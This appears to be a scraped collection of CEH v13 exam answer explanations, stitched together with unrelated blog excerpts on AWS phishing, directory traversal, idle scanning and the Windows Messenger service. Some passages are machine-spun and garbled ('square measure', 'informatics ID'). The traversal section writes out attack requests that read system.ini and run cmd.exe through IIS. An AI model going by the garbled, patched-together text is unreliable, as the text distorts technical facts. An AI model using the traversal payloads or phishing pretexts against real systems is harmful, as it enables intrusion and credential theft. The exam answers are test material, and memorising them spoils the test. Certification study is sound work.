The host discovery technique that the tester should use is TCP SYN Ping Scan. This technique sends a TCP SYN packet to a specified port on the target host and waits for a response. If the host responds with a TCP SYN/ACK packet, it means the host is alive and the port is open. If the host responds with a TCP RST packet, it means the host is alive but the port is closed. If the host does not respond at all, it means the host is either dead or filtered by a firewall12. TCP SYN Ping Scan can bypass firewall restrictions because it mimics the initial stage of a TCP three-way handshake, which is a common and legitimate network activity. Therefore, most firewalls will allow TCP SYN packets to pass through and reach the target host, unless they are configured to block specific ports or IP addresses3. TCP SYN Ping Scan can also accurately identify live systems because it does not rely on ICMP, which may be blocked or rate-limited by some firewalls or routers.

The other options are not as effective or feasible as TCP SYN Ping Scan for the following reasons:

A. UDP Ping Scan: This technique sends a UDP packet to a specified port on the target host and waits for a response. If the host responds with an ICMP Port Unreachable message, it means the host is alive but the port is closed. If the host does not respond at all, it means the host is either dead, the port is open, or the packet is filtered by a firewall12. UDP Ping Scan may not bypass firewall restrictions because some firewalls may block or drop UDP packets, especially if they are sent to uncommon or reserved ports. UDP Ping Scan may also not accurately identify live systems because it cannot distinguish between open ports and filtered packets, and it may generate false positives or negatives due to packet loss or rate-limiting.

B. ICMP ECHO Ping Scan: This technique sends an ICMP ECHO Request packet to the target host and waits for an ICMP ECHO Reply packet. If the host responds with an ICMP ECHO Reply packet, it means the host is alive. If the host does not respond at all, it means the host is either dead or filtered by a firewall12. ICMP ECHO Ping Scan may not bypass firewall restrictions because some firewalls may block or drop ICMP packets, especially if they are sent to prevent ping sweeps or denial-of-service attacks. ICMP ECHO Ping Scan may also not accurately identify live systems because it may generate false positives or negatives due to packet loss or rate-limiting.

C. ICMP Timestamp Ping Scan: This technique sends an ICMP Timestamp Request packet to the target host and waits for an ICMP Timestamp Reply packet. If the host responds with an ICMP Timestamp Reply packet, it means the host is alive. If the host does not respond at all, it means the host is either dead or filtered by a firewall12. ICMP Timestamp Ping Scan may not bypass firewall restrictions because some firewalls may block or drop ICMP packets, especially if they are sent to prevent ping sweeps or denial-of-service attacks. ICMP Timestamp Ping Scan may also not accurately identify live systems because it may generate false positives or negatives due to packet loss or rate-limiting.

In CEH v13 Module 04: Enumeration, identifying services based on well-known port numbers is foundational for enumeration and scanning activities.

Port 21/TCP is assigned to the File Transfer Protocol (FTP).

FTP is a standard protocol used to upload, download, and manage files on a remote server.

During enumeration, open FTP ports can be probed for:

Anonymous login

Banner grabbing

Directory traversal vulnerabilities

Option Clarification:

A. BGP: Runs on TCP port 179.

C. NFS: Commonly uses port 2049.

D. RPC: Dynamically uses multiple ports.

Correct answer is B. FTP (port 21).

Just like any other service that accepts usernames and passwords for logging in, AWS users are vulnerable to social engineering attacks from attackers. fake emails, calls, or any other method of social engineering, may find yourself with an AWS users’ credentials within the hands of an attacker.

If a user only uses API keys for accessing AWS, general phishing techniques could still use to gain access to other accounts or their pc itself, where the attacker may then pull the API keys for aforementioned AWS user.

With basic opensource intelligence (OSINT), it’s usually simple to collect a list of workers of an organization that use AWS on a regular basis. This list will then be targeted with spear phishing to do and gather credentials. an easy technique may include an email that says your bill has spiked 500th within the past 24 hours, “click here for additional information”, and when they click the link, they’re forwarded to a malicious copy of the AWS login page designed to steal their credentials.

An example of such an email will be seen within the screenshot below. it’s exactly like an email that AWS would send to you if you were to exceed the free tier limits, except for a few little changes. If you clicked on any of the highlighted regions within the screenshot, you’d not be taken to the official AWS web site and you’d instead be forwarded to a pretend login page setup to steal your credentials.

These emails will get even more specific by playing a touch bit additional OSINT before causing them out. If an attacker was ready to discover your AWS account ID on-line somewhere, they could use methods we at rhino have free previously to enumerate what users and roles exist in your account with none logs contact on your side. they could use this list to more refine their target list, further as their emails to reference services they will know that you often use.

For reference, the journal post for using AWS account IDs for role enumeration will be found here and the journal post for using AWS account IDs for user enumeration will be found here.

During engagements at rhino, we find that phishing is one in all the fastest ways for us to achieve access to an AWS environment.

A null user is a special connection made to a Windows system without providing a username or password. In older versions of Windows (NT, 2000, XP), null sessions could be used to anonymously connect to IPC$ share and enumerate:

Users

Groups

Shares

Policies

From CEH v13 Courseware:

Module 4: Enumeration → Null Sessions

CEH v13 Study Guide states:

“Null users are unauthenticated sessions used to access certain system resources without credentials. These are commonly used in enumeration attacks.”

Vulnerability-Management Life Cycle The vulnerability management life cycle is an important process that helps identify and remediate security weaknesses before they can be exploited. 4.Remediation - applying fixes on vulnerable systems in order to reduce the impact and severity of vulnerabilities. (P.515/499)

<03>

Windows Messenger administration

Courier administration is an organization based framework notice Windows administration by Microsoft that was remembered for some prior forms of Microsoft Windows.

This resigned innovation, despite the fact that it has a comparable name, isn’t connected in any capacity to the later, Internet-based Microsoft Messenger administration for texting or to Windows Messenger and Windows Live Messenger (earlier named MSN Messenger) customer programming.

The Messenger Service was initially intended for use by framework managers to tell Windows clients about their networks.[1] It has been utilized malevolently to introduce spring up commercials to clients over the Internet (by utilizing mass-informing frameworks which sent an ideal message to a predetermined scope of IP addresses). Despite the fact that Windows XP incorporates a firewall, it isn’t empowered naturally. Along these lines, numerous clients got such messages. Because of this maltreatment, the Messenger Service has been debilitated as a matter of course in Windows XP Service Pack 2.

In CEH v13 Module 02: Footprinting and Reconnaissance, Dark Web Footprinting is discussed as an advanced form of reconnaissance where attackers access hidden services and data using anonymity networks such as Tor (The Onion Router), I2P, or Freenet. These networks enable access to the deep web and dark web, where unindexed, and often illicit, content resides.

Key points relevant to this scenario:

The attacker encrypted browsing traffic and navigated anonymously, which strongly implies the use of tools like Tor or VPNs to mask identity.

The attacker used specialized tools/search engines like:

Torch

Ahmia

DarkSearch

Candle

The goal was to find sensitive or hidden information in government or federal systems — a common dark web footprinting objective.

The final step involved an attack that left no trace, which aligns with using the dark web for anonymity and obfuscation.

Option Analysis:

A. Dark web footprinting

Correct. This matches the behavior described: encrypted, anonymous access to sensitive information through dark web tools.

B. VoIP footprinting ❌

Incorrect. VoIP footprinting relates to identifying vulnerabilities or metadata in Voice over IP systems, not anonymous browsing or dark web activities.

C. VPN footprinting ❌

Incorrect. While VPNs may be used as part of anonymity, VPN footprinting refers to identifying systems using VPNs — not the act of gathering data anonymously.

D. Website footprinting ❌

Incorrect. Website footprinting involves gathering information from public-facing websites, like WHOIS data, robots.txt, and HTML metadata — not hidden dark web content.

Reference from CEH v13 Study Guide and Courseware:

Module 02 – Footprinting and Reconnaissance, Section: Footprinting through Dark Web and Deep Web

CEH v13 iLabs: Using Tor and Dark Web Search Engines for Reconnaissance

CEH Engage – Phase 1 (Reconnaissance): Dark Web Intelligence Gathering

DNS zone transfers occur when a secondary name server (slave) checks the Start of Authority (SOA) record from the primary server. The serial number in the SOA indicates the version of the zone file.

If:

Primary SOA serial > Secondary SOA serial

→ Zone transfer is initiated by the secondary server to update its data.

From CEH v13:

Module 3: DNS Enumeration

Topic: Zone Transfers and SOA Logic

CEH v13 Study Guide states:

“A secondary name server periodically queries the primary name server for changes. If the serial number in the SOA record is higher on the primary, it indicates a zone update, and a zone transfer is triggered.”

Incorrect Options:

B: Reversed condition

C/D: Restarting services doesn’t necessarily trigger a transfer

E: TTL expiration affects caching, not zone transfer logic

Trident is a highly sophisticated spyware tool used in mobile surveillance operations. It exploits multiple zero-day vulnerabilities to jailbreak iPhones remotely and grant full control to the attacker. It is famously associated with the Pegasus spyware, which was able to:

Record calls and ambient sound

Capture screenshots

Read SMS, emails, and contacts

Monitor GPS and application use

As per CEH v13:

Trident uses a chain of exploits to compromise iOS devices without physical access.

It was used in highly targeted attacks against journalists, activists, and government officials.

Incorrect Options:

A. DroidSheep is an Android tool for session hijacking on unsecured Wi-Fi.

B. Androrat is a RAT for Android devices.

C. Zscaler is a cloud security platform, not malware.

Reference – CEH v13 Official Courseware:

Module 17: Hacking Mobile Platforms

Section: “iOS Malware”

Subsection: “Spyware like Trident and Pegasus”

===========

CEH v13 distinguishes between vertical and horizontal privilege escalation. Vertical escalation occurs when an attacker moves upward in the hierarchy of privileges—such as from a regular user to an administrator or root—by exploiting vulnerabilities, misconfigurations, or insecure privilege boundaries. This allows the attacker to perform tasks that were previously restricted, such as modifying system settings, accessing sensitive data, installing malware, or controlling the entire environment. Horizontal escalation, on the other hand, involves accessing another user’s resources at the same privilege level, which the other options describe. Exploiting unquoted service paths or weak access controls may facilitate privilege abuse, but they do not inherently elevate the user to a higher privilege tier unless they specifically lead to administrative execution. The scenario that aligns perfectly with the CEH definition of vertical privilege escalation is the escalation from regular user to administrator.

CEH v13 explains that WPA2-Enterprise replaces the static, shared password model of WPA2-Personal with a centralized authentication system that relies on the 802.1X framework. The essential component of this architecture is RADIUS integrated with EAP, which manages user authentication, device identity verification, and dynamic session key generation. RADIUS acts as the backend authentication server, while EAP provides a flexible authentication framework supporting certificates, smartcards, or credentials. This combination allows organizations to enforce per-user access control policies, revoke individual users without changing network-wide passwords, and generate unique Pairwise Master Keys (PMKs) for every authenticated session. CEH highlights that one of the major advantages of WPA2-Enterprise is its ability to produce unique encryption keys for each client, preventing key reuse and mitigating lateral movement if one device is compromised. Certificate-based EAP types such as EAP-TLS introduce mutual authentication, ensuring both client and server validate each other’s identity before allowing network access. This significantly increases security posture compared to PSK networks, which cannot scale securely for large enterprise deployments.

According to CEH v13 Module 06: Malware Threats, USB Dumper is a tool often used in insider threat or data exfiltration scenarios, where it automatically and silently copies files from any USB drive connected to a system.

It operates in the background and requires no user interaction once installed.

Files are copied from the USB to a pre-configured local directory.

USB Dumper is used in various penetration testing scenarios to simulate data theft using physical access.

Option Clarifications:

A. USB Grabber: Not a recognized standard tool in CEH or industry.

B. USB Snoopy: Used for monitoring USB communications (not silent copying).

C. USB Sniffer: Used for sniffing USB device communication traffic, not file theft.

D. USB Dumper: Correct tool for silently copying USB content.

A Protocol Analyzer is the correct tool used to examine the contents of packet data (often stored in .pcap files) to determine if a particular sequence of traffic is suspicious, malformed, or part of a known exploit.

In CEH v13:

Module 3: Scanning Networks

Module 4: Enumeration

Module 5: Vulnerability Analysis

Related Lab: Packet Analysis using Wireshark

The CEH v13 Study Guide states:

“A protocol analyzer (e.g., Wireshark) captures and decodes packets to display their contents and help analysts understand communication flows and anomalies. It is used to manually inspect packet contents and behavior, which helps distinguish legitimate traffic from attacks.”

PCAP (Packet Capture) files are typically analyzed using tools like Wireshark. These tools decode protocol layers and show payloads, making it easier for analysts to identify if IDS alerts were accurate or false positives.

Incorrect Options:

B. Network sniffer: General term; protocol analyzer is the specific functional tool used.

C. IPS: Prevents or blocks malicious traffic, but does not analyze existing packet captures.

D. Vulnerability scanner: Identifies vulnerabilities on systems/services; not used for packet capture review.

snmp-check (snmp_enum Module) is the best tool to help the ethical hacker to get the information without directly modifying any parameters within the SNMP agent’s MIB. snmp-check is a tool that allows the user to enumerate SNMP devices and extract information from them. It can gather a wide array of information about the target, such as system information, network interfaces, routing tables, ARP cache, installed software, running processes, TCP and UDP services, user accounts, and more. snmp-check can also perform brute force attacks to discover the SNMP community strings, which are the passwords used to access the SNMP agent. snmp-check is available as a standalone tool or as a module (snmp_enum) within the Metasploit framework.

The other options are not as effective or suitable as snmp-check for the ethical hacker’s task. Nmap is a network scanning and enumeration tool that can perform various types of scans and probes on the target. It can also run scripts to perform specific tasks, such as retrieving SNMP information. However, Nmap may not be able to gather as much information as snmp-check, and it may also trigger alerts or blocks from firewalls or intrusion detection systems. Oputils is a network monitoring and management toolset that can perform various functions, such as device discovery, configuration backup, bandwidth monitoring, IP address management, and more. However, Oputils is mainly designed for device management and not SNMP enumeration, and it may not be able to extract valuable network information from the SNMP agent. SnmpWalk is a tool that allows the user to retrieve the entire MIB tree of an SNMP agent by using SNMP GETNEXT requests. However, SnmpWalk is not suitable for the ethical hacker’s task, because it requires the user to change an OID (object identifier) to a different value, which may modify the parameters within the SNMP agent’s MIB and affect its functionality or security. References:

snmp-check - The SNMP enumerator

SNMP Enumeration | Ethical Hacking - GreyCampus

SNMP Enumeration - GeeksforGeeks

Nmap - the Network Mapper - Free Security Scanner

OpUtils - Network Monitoring & Management Toolset

SnmpWalk - SNMP MIB Browser

Burp Suite is a comprehensive web vulnerability scanner and testing suite widely used in penetration testing and ethical hacking.

Key features include:

Intercepting proxy: Allows inspection and modification of traffic between the browser and target server.

Session hijacking/testing tools

Intruder and Repeater modules for customized payload injection

Sequencer module for testing session token randomness

Extensibility through plugins and custom scripts

Incorrect Options:

A. Nmap is a network scanning tool, not used for intercepting web traffic.

C. CxSAST (Checkmarx) is a static application security testing (SAST) tool.

D. Wireshark is a packet analyzer but does not include intercepting proxy features or token testing.

Reference – CEH v13 Official Courseware:

Module 14: Hacking Web Applications

Section: “Burp Suite as a Web Vulnerability Testing Tool”

CEH iLab: Using Burp Suite for Web App Testing

===========

The php.ini file may be a special file for PHP. it’s where you declare changes to your PHP settings. The server is already configured with standard settings for PHP, which your site will use by default. Unless you would like to vary one or more settings, there’s no got to create or modify a php.ini file. If you’d wish to make any changes to settings, please do so through the MultiPHP INI Editor.

Appropriately controlling admittance to web content is significant for running a safe web worker. Index crossing or Path Traversal is a HTTP assault which permits aggressors to get to limited catalogs and execute orders outside of the web worker’s root registry.

Web workers give two primary degrees of security instruments

Access Control Lists (ACLs)

Root index

An Access Control List is utilized in the approval cycle. It is a rundown which the web worker’s manager uses to show which clients or gatherings can get to, change or execute specific records on the worker, just as other access rights.

The root registry is a particular index on the worker record framework in which the clients are kept. Clients can’t get to anything over this root.

For instance: the default root registry of IIS on Windows is C:\Inetpub\wwwroot and with this arrangement, a client doesn’t approach C:\Windows yet approaches C:\Inetpub\wwwroot\news and some other indexes and documents under the root catalog (given that the client is confirmed by means of the ACLs).

The root index keeps clients from getting to any documents on the worker, for example, C:\WINDOWS/system32/win.ini on Windows stages and the/and so on/passwd record on Linux/UNIX stages.

This weakness can exist either in the web worker programming itself or in the web application code.

To play out a registry crossing assault, all an assailant requires is an internet browser and some information on where to aimlessly discover any default documents and registries on the framework.

What an assailant can do if your site is defenseless

With a framework defenseless against index crossing, an aggressor can utilize this weakness to venture out of the root catalog and access different pieces of the record framework. This may enable the assailant to see confined documents, which could give the aggressor more data needed to additional trade off the framework.

Contingent upon how the site access is set up, the aggressor will execute orders by mimicking himself as the client which is related with “the site”. Along these lines everything relies upon what the site client has been offered admittance to in the framework.

Illustration of a Directory Traversal assault by means of web application code

In web applications with dynamic pages, input is generally gotten from programs through GET or POST solicitation techniques. Here is an illustration of a HTTP GET demand URL

GET http://test.webarticles.com/show.asp?view=oldarchive.html HTTP/1.1

Host: test.webarticles.com

With this URL, the browser requests the dynamic page show.asp from the server and with it also sends the parameter view with the value of oldarchive.html. When this request is executed on the web server, show.asp retrieves the file oldarchive.html from the server’s file system, renders it and then sends it back to the browser which displays it to the user. The attacker would assume that show.asp can retrieve files from the file system and sends the following custom URL.

GET http://test.webarticles.com/show.asp?view=../../../../../Windows/system.ini HTTP/1.1

Host: test.webarticles.com

This will cause the dynamic page to retrieve the file system.ini from the file system and display it to the user. The expression ../ instructs the system to go one directory up which is commonly used as an operating system directive. The attacker has to guess how many directories he has to go up to find the Windows folder on the system, but this is easily done by trial and error.

Example of a Directory Traversal attack via web server

Apart from vulnerabilities in the code, even the web server itself can be open to directory traversal attacks. The problem can either be incorporated into the web server software or inside some sample script files left available on the server.

The vulnerability has been fixed in the latest versions of web server software, but there are web servers online which are still using older versions of IIS and Apache which might be open to directory traversal attacks. Even though you might be using a web server software version that has fixed this vulnerability, you might still have some sensitive default script directories exposed which are well known to hackers.

For example, a URL request which makes use of the scripts directory of IIS to traverse directories and execute a command can be

GET http://server.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c:\ HTTP/1.1

Host: server.com

The request would return to the user a list of all files in the C:\ directory by executing the cmd.exe command shell file and run the command dir c:\ in the shell. The %5c expression that is in the URL request is a web server escape code which is used to represent normal characters. In this case %5c represents the character \.

Newer versions of modern web server software check for these escape codes and do not let them through. Some older versions however, do not filter out these codes in the root directory enforcer and will let the attackers execute such commands.

Whois footprinting is a reconnaissance technique used by attackers and penetration testers to gather publicly available information about domain names. By performing a Whois lookup, one can retrieve:

Domain registrant details (name, email, phone, and address)

Domain registration and expiry dates

Name servers and registrar information

Administrative and technical contact data

According to CEH v13:

Whois databases are maintained by Internet registrars and can be queried through tools like whois lookup or websites such as https://whois.domaintools.com.

This information helps attackers build a profile of the organization, identify potential social engineering targets, and even understand domain structure for further attacks.

Incorrect Options:

A. VPN footprinting refers to identifying VPN gateways or configurations — not related to domain data.

B. Email footprinting involves gathering information from or about email systems.

C. VoIP footprinting targets IP-based telephony systems, such as SIP endpoints.

Reference – CEH v13 Official Courseware:

Module 02: Footprinting and Reconnaissance

Section: “WHOIS Footprinting”

Tools: Whois lookup tools, ICANN WHOIS, DomainTools

In CEH v13 Module 09: Social Engineering, scareware is defined as a malicious tactic that uses fear, panic, or urgency to trick users into performing harmful actions such as downloading fake software or clicking malicious links.

Common Scareware Example:

A pop-up warns the user: “Your system is infected! Install this antivirus now!”

Victim downloads malware disguised as a solution.

Often used to deliver spyware, ransomware, or trojans.

Option Review:

A. Free cruise: Classic example of baiting, not scareware.

B. Account locked: Closer to phishing or credential harvesting.

C. Delivery delay: Another phishing variation.

D. Pop-up about infection: True scareware tactic.

True Positive - IDS referring a behavior as an attack, in real life it is

True Negative - IDS referring a behavior not an attack and in real life it is not

False Positive - IDS referring a behavior as an attack, in real life it is not

False Negative - IDS referring a behavior not an attack, but in real life is an attack.

False Negative - is the most serious and dangerous state of all !!!!

https://en.wikipedia.org/wiki/Private_network

In IP networking, a private network is a computer network that uses private IP address space. Both the IPv4 and the IPv6 specifications define private IP address ranges. These addresses are commonly used for local area networks (LANs) in residential, office, and enterprise environments.

Private network addresses are not allocated to any specific organization. Anyone may use these addresses without approval from regional or local Internet registries. Private IP address spaces were originally defined to assist in delaying IPv4 address exhaustion. IP packets originating from or addressed to a private IP address cannot be routed through the public Internet.

The Internet Engineering Task Force (IETF) has directed the Internet Assigned Numbers Authority (IANA) to reserve the following IPv4 address ranges for private networks:

· 10.0.0.0 – 10.255.255.255

· 172.16.0.0 – 172.31.255.255

· 192.168.0.0 – 192.168.255.255

Backbone routers do not allow packets from or to internal IP addresses. That is, intranet machines, if no measures are taken, are isolated from the Internet. However, several technologies allow such machines to connect to the Internet.

· Mediation servers like IRC, Usenet, SMTP and Proxy server

· Network address translation (NAT)

· Tunneling protocol

NOTE: So, the problem is just one of these technologies.

Non-repudiation is the assurance that someone cannot deny the validity of something. Non-repudiation is a legal concept that is widely used in information security and refers to a service, which provides proof of the origin of data and the integrity of the data. In other words, non-repudiation makes it very difficult to successfully deny who/where a message came from as well as the authenticity and integrity of that message.

White-hat hackers perform security assessments with authorization. CEH defines ethical hacking as legal, structured testing of network defenses with the goal of improving security rather than causing harm.

A covert channel is a communication method used to transfer information in a way that violates security policy, often by repurposing legitimate protocols or functions for unauthorized communication.

From CEH v13 Official Courseware:

Module 6: Malware Threats

Topic: Covert Communication and Data Exfiltration Techniques

CEH v13 Study Guide states:

“A covert channel exploits unintended uses of legitimate communication protocols. It allows data to be transmitted without detection by hiding the communication inside seemingly benign traffic.”

Incorrect Options:

A: A non-standard port may aid in hiding services, but doesn’t constitute a covert channel.

C: Multiplexing is a normal communication mechanism.

D: WEP is insecure, but this isn’t related to covert channels.

Lock-in reflects the inability of the client to migrate from one CSP to another or in-house systems owing to the lack of tools, procedures, standard data formats, applications, and service portability. This threat is related to the inappropriate selection of a CSP, incomplete and non-transparent terms of use, lack of standard mechanisms, etc. (P.2884/2868)

Syhunt Hybrid combines comprehensive static and dynamic security scans to detect vulnerabilities like XSS, File Inclusion, SQL Injection, Command Execution and many more, including inferential, in-band and out-of-band attacks through Hybrid-Augmented Analysis (HAST). With Syhunt's unique gray box/hybrid scanning capability the information acquired during source code scans is automatically used to create and enhance dynamic scans. All entry points are covered generating detailed information about the security level of your web applications. Available for on-premises deployment for businesses using Windows and Linux 64-bit.

Web Server Security Tools - Web Application Security Scanners The Syhunt Hybrid scanner automates web application security testing and guards the organization’s web infrastructure against web application security threats. Syhunt Dynamic crawls websites and detects XSS, directory transversal problems, fault injection, SQL injection, attempts to execute commands, and several other attacks. (P.1713/1697)

Comprehensive and Detailed Explanation:

Wireshark on Windows requires WinPcap to operate. WinPcap is a packet capture library that allows network interfaces to operate in promiscuous mode, which is essential for sniffing traffic.

From CEH v13 Courseware:

Module 8: Sniffing → Sniffing Tools → WinPcap for Windows

DHCP starvation is a network-level attack in which an attacker sends a massive number of DHCPDISCOVER requests, each appearing to originate from a different MAC address. CEH courseware explains that DHCP servers assign IP leases based on unique MAC addresses, and when the lease pool is exhausted, legitimate clients are unable to obtain valid IP configurations. This disrupts network connectivity and can serve as a precursor to deploying a rogue DHCP server, enabling further attacks such as traffic redirection or credential interception. DHCP starvation is different from ARP spoofing, which manipulates MAC–IP mappings, or DNS poisoning, which corrupts domain resolution. Rogue DHCP relay attacks involve forwarding DHCP packets to unauthorized servers, not depleting leases. The scenario described—rapid MAC address spoofing and exhaustion of DHCP leases—matches the precise definition of DHCP starvation as documented in CEH materials.

Comprehensive Explanation from CEH v13 Courseware:

CEH v13 explains that TOCTOU (Time-of-Check Time-of-Use) vulnerabilities arise when a system checks a condition (such as file permissions) and then later uses the resource based on that assumption. If there is even a tiny gap between the validation and the actual use, attackers can exploit this race condition by replacing or modifying the resource after validation but before execution. This is common in file-handling operations involving temporary files, symbolic links, or shared directories. CEH emphasizes that TOCTOU attacks often lead to privilege escalation, unauthorized execution, or tampering with data because the system trusts the earlier validation step. The attacker swaps the file at precisely the right moment, taking advantage of a race window. The other options—certificate validation, integer overflow, and null pointer dereference—do not involve timing-based race conditions. The scenario exactly matches CEH’s description of TOCTOU exploitation, where attackers manipulate file access in the interval between validation and execution.

The ethical hacker conducted Test 1, which is a TCP/IP stack fingerprinting technique that uses the SYN and ECN-Echo flags to determine the OS of the target system. The SYN flag is used to initiate a TCP connection, and the ECN-Echo flag is used to indicate that the sender supports Explicit Congestion Notification (ECN), which is a mechanism to reduce network congestion. Different OSes have different implementations and responses to these flags, which can reveal their identity. For example, Windows XP and 2000 will reply with SYN and ECN-Echo flags set, while Linux will reply with only SYN flag set. By sending a TCP packet with these flags enabled to an open TCP port and observing the reply, the ethical hacker can probe the nature of the response and subsequently determine the OS fingerprint.

The ethical hacker adopted this specific approach because it is an advanced and stealthy technique that can evade some firewalls and intrusion detection systems (IDS) that may block or alert other types of packets, such as NULL, FIN, or Xmas packets. Moreover, this technique can provide more accurate and reliable results than other techniques, such as banner grabbing or passive analysis, that may depend on the availability or validity of the information provided by the target system.

The other options are not correct, as they describe different tests and reasons. Test 3 is a TCP/IP stack fingerprinting technique that uses the URG, PSH, SYN, and FIN flags to determine the OS of the target system. Test 2 is a TCP/IP stack fingerprinting technique that uses a NULL packet, which is a TCP packet with no flags enabled, to determine the OS of the target system. Test 6 is a TCP/IP stack fingerprinting technique that uses the ACK flag, which is used to acknowledge the receipt of a TCP segment, to determine the OS of the target system. References:

OS and Application Fingerprinting | SANS Institute

Operating System Fingerprinting | SpringerLink

OS and Application Fingerprinting - community.akamai.com

What is OS Fingerprinting and Techniques - Zerosuniverse

According to CEH v13, one of the most effective defenses against rogue DHCP servers is DHCP snooping, a Layer 2 security feature that classifies switch ports as either trusted or untrusted. DHCP responses are permitted only on trusted ports, typically those connected to legitimate DHCP servers. Any DHCP OFFER or ACK originating from an untrusted port is dropped automatically. In the scenario, the rogue DHCP server is sending unauthorized configuration settings because the switch is forwarding DHCP messages from all ports without restriction. CEH specifically warns that unmanaged or misconfigured switches allow rogue DHCP servers to assign malicious DNS, gateway, or IP configurations, enabling traffic redirection, interception, or man-in-the-middle attacks. ARP inspection (Option B) protects against ARP spoofing but not DHCP abuses. Port security (Option C) prevents MAC flooding, not DHCP impersonation. Static reservations (Option D) do not scale and do not stop rogue DHCP servers. DHCP snooping directly mitigates this threat.

CEH v13 explains that WPA2-PSK security relies on the strength of the pre-shared key. Once the 4-way handshake is captured, the attacker must attempt offline cracking. CEH emphasizes that the dictionary attack is the most efficient and commonly used cracking method because it tests structured wordlists, human-derived passwords, and hybrid permutations, dramatically reducing time compared to full brute force. Brute forcing (Option B) is computationally heavy and often impractical unless the password is extremely short. XSS (Option A) and SQL injection (Option D) have no relevance to WPA2 authentication, which occurs at the wireless protocol level, not the router’s web interface. The dictionary attack is highlighted in CEH as the principal technique used with tools like aircrack-ng, hashcat, and pyrit, allowing rapid key testing using optimized GPU or CPU cracking. Thus, Option C is the most effective and CEH-aligned method.

In CEH v13 Module 17: Mobile and IoT Security, Advanced SMS Phishing (also known as SMiShing) is described as a technique where attackers impersonate trusted entities via SMS to:

Trick users into entering authentication codes or PINs.

Deliver malicious payloads or alter device configurations.

Simulate OTA (Over-the-Air) provisioning messages.

In this case:

The attacker sends a fake OTA setup message asking for a PIN.

Once Ben enters the PIN, the device's configuration is hijacked.

Why Others Are Incorrect:

B. Bypass SSL pinning: Relates to mobile app reverse engineering and traffic interception.

C. Phishing: General term; SMS-specific variant is more accurate here.

D. Tap ‘n ghost: A touch screen manipulation attack, unrelated to messaging.

Correct answer is A. Advanced SMS phishing.

A brute-force attack is the most exhaustive password-cracking method. It tries every possible combination of characters (letters, numbers, and symbols) until the correct password is found.

From CEH v13 Courseware:

Module 6: Password Cracking Techniques

CEH v13 Study Guide states:

“Brute-force attacks try every possible combination until the correct password is discovered. It’s resource-intensive but guarantees success if enough time and processing power is available.”

Incorrect Options:

B: Refers to social engineering or coercion.

C: Describes a dictionary attack.

D: Refers to a rainbow table attack.

E: Not a cracking method.

Zone transfers (AXFR) are DNS operations used to replicate DNS data from a primary to a secondary server. If improperly configured, attackers can request these transfers and retrieve valuable DNS information, including hostnames and IPs.

Correct Statements:

A: Zone transfers are DNS protocol operations.

C: They transfer the entire DNS zone file (records for the domain).

E: Zone transfers use TCP port 53. Blocking it can prevent unauthorized transfers.

From CEH v13 Courseware:

Module 3: Scanning Networks

Topic: DNS Enumeration → Zone Transfers

CEH v13 Study Guide states:

“A zone transfer is a mechanism used by DNS servers to replicate databases. It can be used by attackers to retrieve detailed DNS information if not properly restricted. Zone transfers occur over TCP port 53.”

Incorrect Statements:

B/D: nslookup is a query tool; it doesn’t perform or manage zone transfers.

F: Zone transfers can happen on the internet if DNS servers are misconfigured.

According to CEH v13 Module 09: Social Engineering, both pharming and phishing are forms of fraud that direct users to malicious websites. However, their techniques differ:

Pharming involves modifying DNS entries or the victim's host file to silently redirect users to a malicious site without needing user interaction.

Phishing involves sending links via emails or messages where the URL is visually deceptive (misspelled, similar domain names, homoglyph attacks).

A DNS zone file contains resource records (RRs) that define mappings and configurations for domains and subdomains. The standard records found in a zone file include:

SOA (Start of Authority): Indicates the beginning of the zone file.

NS (Name Server): Specifies the authoritative name servers.

A (Address): Maps hostnames to IPv4 addresses.

MX (Mail Exchange): Specifies mail servers.

These records are essential for the DNS resolution process and mail routing.

From CEH v13 Official Courseware:

Module 3: DNS Enumeration

Topic: DNS Record Types

CEH v13 Study Guide states:

“A zone file contains all the resource records including SOA, NS, A, and MX. These define name server authority, IP resolution, and mail server routing.”

Incorrect Options:

A: DNS is a protocol, not a resource record.

B: PTR is for reverse DNS, typically in a separate reverse zone file.

C: AXFR is a DNS transfer mechanism, not an RR in the zone file.

The idle scan could be a communications protocol port scan technique that consists of causing spoofed packets to a pc to seek out out what services square measure obtainable. this can be accomplished by impersonating another pc whose network traffic is extremely slow or nonexistent (that is, not transmission or receiving information). this might be associate idle pc, known as a “zombie”.

This action are often done through common code network utilities like nmap and hping. The attack involves causing solid packets to a particular machine target in an attempt to seek out distinct characteristics of another zombie machine. The attack is refined as a result of there’s no interaction between the offender pc and also the target: the offender interacts solely with the “zombie” pc.

This exploit functions with 2 functions, as a port scanner and a clerk of sure informatics relationships between machines. The target system interacts with the “zombie” pc and distinction in behavior are often discovered mistreatment totally different|completely different “zombies” with proof of various privileges granted by the target to different computers.

The overall intention behind the idle scan is to “check the port standing whereas remaining utterly invisible to the targeted host.”

The first step in execution associate idle scan is to seek out associate applicable zombie. It must assign informatics ID packets incrementally on a worldwide (rather than per-host it communicates with) basis. It ought to be idle (hence the scan name), as extraneous traffic can raise its informatics ID sequence, confusing the scan logic. The lower the latency between the offender and also the zombie, and between the zombie and also the target, the quicker the scan can proceed.

Note that once a port is open, IPIDs increment by a pair of. Following is that the sequence:

offender to focus on -> SYN, target to zombie ->SYN/ACK, Zombie to focus on -> RST (IPID increment by 1)

currently offender tries to probe zombie for result. offender to Zombie ->SYN/ACK, Zombie to offender -> RST (IPID increment by 1)

So, during this method IPID increments by a pair of finally.

When associate idle scan is tried, tools (for example nmap) tests the projected zombie and reports any issues with it. If one does not work, attempt another. Enough net hosts square measure vulnerable that zombie candidates are not exhausting to seek out. a standard approach is to easily execute a ping sweep of some network. selecting a network close to your supply address, or close to the target, produces higher results. you’ll be able to attempt associate idle scan mistreatment every obtainable host from the ping sweep results till you discover one that works. As usual, it’s best to raise permission before mistreatment someone’s machines for surprising functions like idle scanning.

Simple network devices typically create nice zombies as a result of {they square measure|they’re} normally each underused (idle) and designed with straightforward network stacks that are susceptible to informatics ID traffic detection.

While distinguishing an acceptable zombie takes some initial work, you’ll be able to keep re-using the nice ones. as an alternative, there are some analysis on utilizing unplanned public internet services as zombie hosts to perform similar idle scans. leverage the approach a number of these services perform departing connections upon user submissions will function some quite poor’s man idle scanning.

DNS poisoning (also known as DNS cache poisoning) occurs when a malicious actor injects false DNS data into a DNS resolver's cache. The poisoned entry will persist for the duration of its TTL (Time To Live), which is defined in the DNS SOA (Start of Authority) record.

The SOA record contains several fields including:

Serial number

Refresh

Retry

Expire

Minimum TTL

The Minimum TTL value in the SOA record determines how long a DNS resolver should cache the DNS data — including any potentially poisoned data.

